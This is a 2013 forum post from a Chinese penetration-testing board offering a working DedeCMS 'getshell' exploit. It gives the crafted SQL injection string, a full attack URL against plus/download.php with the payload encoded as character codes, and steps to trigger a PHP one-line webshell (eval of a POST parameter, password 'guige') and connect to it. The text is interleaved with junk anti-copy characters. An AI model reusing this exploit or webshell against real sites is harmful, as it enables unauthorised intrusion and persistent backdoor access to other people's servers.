中国网络渗透测试联盟

标题: dedecms漏洞getshell EXP最新 [打印本页]

作者: admin    时间: 2013-6-10 16:49
标题: dedecms漏洞getshell EXP最新
本帖最后由 土豆 于 2013-6-10 14:41 编辑
/ ?( ?- P/ U* c4 R  {% p1 ?: D
& ^2 `4 I8 r: l. p$ e' D
" A! k3 h- _3 N/ T& r/ o作者:鬼哥
( k. ]7 w; e  i! i5 m* H$ z! K
- h7 q1 G! y+ U5 D) q看贴不回,没JJ
8 ~$ Z6 J) v5 |& a
# |& C, H* B5 }5 T7 p漏洞大家都知道是哪个。
( k* U, V2 `* d: \% I8 w8 z$ {& ?7 P+ D
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。# V- k5 }! e7 C3 S4 I) r0 A( V( R
  i/ Z5 w$ Y1 Q9 v. a
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。4 w; B: v7 S1 }) ]% e/ p
- n' m' F; Q$ R! X4 g$ e$ e7 |
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?3 n6 ?1 j" v* V# u

$ |) }5 {8 h! fgetshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。
3 |5 Q, I6 {# {: t4 M+ T0 F
2 P/ d2 q' d4 U, N8 b% K$ n但是测试了下。。失败
' d( @7 A7 }. H0 ?' Q, e! X! x2 W. q2 J2 r/ Z* l' J3 Z
原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。, G( t7 f0 Z$ A- H

1 c' q$ I' K$ o2 M$ Y8 S! w构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`& P) u) g. q# `; S7 X) w* d
6 p7 @( @' A, v- X
EXP:
3 I6 k; e+ w: z- V
; b4 [% h$ b& P7 H, a: \& n! D4 chttp://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
$ d" ~% ~/ y4 |' v! T
9 G& z3 x- {8 f& n2 G- b2 n; r, u9 W! i* k7 a
成功增加。! \" x3 Q% p4 _& w0 V- S: A

" o' ]1 o: D5 m/ R访问http://www.xxx.com/plus/mytag_js.php?aid=9013  e- L9 ]' d+ Q( \- V, t# ^' _4 C
生成一句话木马.1 u2 Y" r, u& d
菜刀连接 http://www.xxx.com/plus/90sec.php  密码 guige
' ~7 a& ^  `' x! g6 G1 x
  g- v; X) w! C+ K5 H- y测试OK。 , o9 C* f. O+ q' G& A1 Q2 P9 j: A$ e
. Y1 S. P# b7 Y" p, W8 F! p% Z
) M$ t" f+ I- B& T2 \





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2